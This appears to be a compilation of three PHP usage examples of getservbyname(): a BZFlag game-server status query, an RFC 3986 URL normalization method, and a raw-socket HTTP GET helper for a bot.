function bzfquery($hostport) { list($server['host'], $server['port']) = split(":", $hostport, 2); $protocol = 'tcp'; $get_prot = getprotobyname($protocol); if ($get_prot == -1) { // if nothing found, returns -1 echo 'Invalid Protocol'; return $server; } if (!$server['port']) { $server['port'] = 5154; } elseif (!ctype_digit($server['port'])) { $server['port'] = getservbyname($server['port'], $protocol); } $server['ip'] = gethostbyname($server['host']); $fp = fsockopen($server['host'], $server['port'], $errno, $errstr, 5); if (!$fp) { echo "{$errstr} ({$errno})\n"; return $server; } fwrite($fp, "BZFLAG\r\n\r\n"); $buffer = fread($fp, 9); //var_dump($buffer); if (strlen($buffer) != 9) { echo "not a bzflag server"; return $server; } # parse reply $server += unpack("a4magic/a4protocol/Cid", $buffer); //var_dump($server); if ($server['magic'] != "BZFS") { echo "not a bzflag server\n"; fclose($fp); return $server; } if ($server['protocol'] != '0222') { echo "incompatible version\n"; fclose($fp); return $server; } # MsgQueryGame + MsgQueryPlayers $request = pack("n2", 0, 0x7167); $request .= pack("n2", 0, 0x7170); //var_dump($request); fwrite($fp, $request); $loop = 0; $have = array(); $have['QueryGame'] = false; $have['QueryPlayers'] = false; $have['TeamUpdate'] = false; $have['AllAddPlayer'] = false; while (in_array(false, $have) && $loop < 64) { $loop++; $packet = readpacket($fp); if ($GLOBALS['debug']) { echo "Length: " . $packet['len'] . "\n"; echo "Code: " . $packet['code'] . " (" . dechex($packet['code']) . ") [" . chr(hexdec(substr(dechex($packet['code']), 0, 2))) . chr(hexdec(substr(dechex($packet['code']), 2, 2))) . "]\n"; echo "Data: " . $packet['data'] . "\n\n"; } switch ($packet['code']) { case MsgQueryGame: $server += unpack("ngameStyle/ngameOptions/nmaxPlayers/nmaxShots/nrogueSize/nredSize/ngreenSize/nblueSize/npurpleSize/nobserverSize/nrogueMax/nredMax/ngreenMax/nblueMax/npurpleMax/nobserverMax/nshakeWins/nshakeTimeout/nmaxPlayerScore/nmaxTeamScore/nmaxTime/ntimeElapsed", $packet['data']); $have['QueryGame'] = true; break; case MsgQueryPlayers: $server += unpack("nnumTotalTeams/nnumPlayers", $packet['data']); unset($server['numTotalTeams']); $have['QueryPlayers'] = true; if ($server['numPlayers'] == 0) { $have['AllAddPlayer'] = true; } break; case MsgTeamUpdate: $server += unpack("CnumTeams", $packet['data']); $packet['data'] = substr($packet['data'], 1); for ($team = 0; $team < $server['numTeams']; $team++) { $server['team'][$team] = unpack("nnum/nsize/nwon/nlost", $packet['data']); $packet['data'] = substr($packet['data'], 8); } $have['TeamUpdate'] = true; break; case MsgAddPlayer: $player = unpack("Cid/ntype/nteam/nwon/nlost/ntks/a32sign/a128motto", $packet['data']); $server['player'][$player['id']] = $player; if (sizeof($server['player']) >= $server['numPlayers']) { $have['AllAddPlayer'] = true; } break; } } fclose($fp); return $server; }
/** * Normalizes the URL * * See RFC 3986, Section 6. Normalization and Comparison * * @link * * @return void */ public function normalize() { // See RFC 3986, section 6 // Scheme is case-insensitive if ($this->_scheme) { $this->_scheme = strtolower($this->_scheme); } // Hostname is case-insensitive if ($this->_host) { $this->_host = strtolower($this->_host); } // Remove default port number for known schemes (RFC 3986, section 6.2.3) if ('' === $this->_port || $this->_port && $this->_scheme && $this->_port == getservbyname($this->_scheme, 'tcp')) { $this->_port = false; } // Normalize case of %XX percentage-encodings (RFC 3986, section // Normalize percentage-encoded unreserved characters (section list($this->_userinfo, $this->_host, $this->_path) = preg_replace_callback('((?:%[0-9a-fA-Z]{2})+)', array($this, '_normalizeCallback'), array($this->_userinfo, $this->_host, $this->_path)); // Path segment normalization (RFC 3986, section $this->_path = self::removeDotSegments($this->_path); // Scheme based normalization (RFC 3986, section 6.2.3) if (false !== $this->_host && '' === $this->_path) { $this->_path = '/'; } // path should start with '/' if there is authority (section 3.3.) if (strlen($this->getAuthority()) && strlen($this->_path) && $this->_path[0] !== '/') { $this->_path = '/' . $this->_path; } }
function get_site_sock($url, $post) { $get_url = parse_url($url); $address = gethostbyname($get_url['host']); /* Get the port for the WWW service. */ $service_port = getservbyname('www', 'tcp'); /* Create a TCP/IP socket. */ $socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP); // Check to see if the socket failed to create. if ($socket === false) { $return["error"] = true; $return["errordesc"] = "Failed to create a socket"; $return["content"] = socket_strerror(socket_last_error()); return $return; } // Set some sane read timeouts to prevent the bot from hanging forever. socket_set_option($socket, SOL_SOCKET, SO_RCVTIMEO, array("sec" => 30, "usec" => 0)); $connect_result = @socket_connect($socket, $address, $service_port); // Make sure we have a connection if ($connect_result === false) { echo "Failed to connect to server: {$url}\n"; $return["error"] = true; $return["errordesc"] = "Coult not connect to server " . $address . ":" . $service_port . " (" . $url . ")"; $return["content"] = socket_strerror(socket_last_error()); return $return; } // Rebuild the full query after parse_url $url = $get_url["path"]; // if (!empty($get_url["query"])) // { // $url .= '?' . $get_url["query"]; // } if (!empty($post)) { $url .= '?' . $post; } $in = "GET {$url} HTTP/1.0\r\n"; $in .= "Host: " . $get_url['host'] . "\r\n"; $in .= "Connection: Close\r\n"; $in .= "User-Agent:TEA 1.1.1\r\n\r\n"; $write_result = @socket_write($socket, $in, strlen($in)); // Make sure we wrote to the server okay. if ($write_result === false) { $return["error"] = true; $return["errordesc"] = "Coult not write to server"; $return["content"] = socket_strerror(socket_last_error()); return $return; } $return["content"] = ""; $read_result = @socket_read($socket, 2048); while ($read_result != "" && $read_result !== false) { $return["content"] .= $read_result; $read_result = @socket_read($socket, 2048); } // Make sure we got a response back from the server. if ($read_result === false) { $return["error"] = true; $return["errordesc"] = "Server returned no data"; $return["content"] = socket_strerror(socket_last_error()); return $return; } $close_result = @socket_close($socket); // Make sure we closed our socket properly. Open sockets are bad! if ($close_result === false) { $return["error"] = true; $return["errordesc"] = "Failed to close socket"; $return["content"] = socket_strerror(socket_last_error()); return $return; } // Did the calling function want http headers stripped? // if ($strip_headers) // { $split = explode("\r\n\r\n", $return['content'], 2); $return["content"] = $split[1]; // } return $return; }